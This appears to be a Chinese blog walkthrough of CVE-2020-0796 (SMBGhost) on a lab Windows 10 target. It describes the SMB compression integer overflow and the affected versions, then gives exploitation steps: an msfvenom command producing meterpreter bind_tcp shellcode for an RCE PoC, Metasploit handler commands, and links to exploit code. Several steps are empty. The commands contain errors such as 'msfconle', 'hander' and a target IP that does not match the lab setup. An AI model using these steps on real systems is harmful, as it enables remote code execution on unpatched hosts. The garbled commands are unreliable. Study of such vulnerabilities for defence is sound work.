cve-2020-0796

一.漏洞概述

1.漏洞公告显示,SMB 3.1.1协议中处理压缩消息时,对其中数据没有经过安全检查,直接使用会引发内存破坏漏洞,可能被攻击者利用远程执行任意代码。攻击者利用该漏洞无须权限即可实现远程代码执行,受黑客攻击的目标系统只需开机在线即可能被入侵。

2.影响范围

 适用于32位系统的Windows 10版本1903

 Windows 10 1903版(用于基于x64的系统)

 Windows 10 1903版(用于基于ARM64的系统)

 Windows Server 1903版(服务器核心安装)

 适用于32位系统的Windows 10版本1909

 Windows 10版本1909(用于基于x64的系统)

 Windows 10 1909版(用于基于ARM64的系统)

 Windows Server版本1909(服务器核心安装)

3.漏洞原理

漏洞发生在srv2.sys中,由于SMB没有正确处理压缩的数据包,在解压数据包的时候使用客户端传过来的长度进行解压时,并没有检查长度是否合法.最终导致整数溢出。

二.漏洞复现

1.漏洞环境:

靶机:win10虚拟机(ipa;172.28.130.181)

攻击机:kali 2020(ip:172.28.130.231)

2.漏洞检测

 

3.本地提权

4.蓝屏测试

  • git下载蓝屏poc,利用Xftp工具上传到kali

  • 安装好依赖
git clone https://github.com/SecureAuthCorp/impacket.git cd impacketpython3 setup.py install

  • 利用脚本进行蓝屏测试

5.kali下生成python版本的反弹shellcode

 

msfvenom -p windows/x64/meterpreter/bind_tcp lport=2333 -f py -o exp.py
  • 查看生成的shellcode

  • 将生成的exp.py代码中的变量buf全部替换成变量USER_PAYLOAD,然后将所有代码粘贴覆盖下面的代码处

  • 漏洞利用,反弹shell


msfconle 
use exploit/multi/hander 
set payload windows/x64/meterpreter/bind_tcp
set lport 2333 
set rhost 172.168.100.3 
run

 

 

 

参考链接:

http://dl.qianxin.com/skylar6/CVE-2020-0796-Scanner.zip

https://github.com/chompie1337/SMBGhost_RCE_PoC

 

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值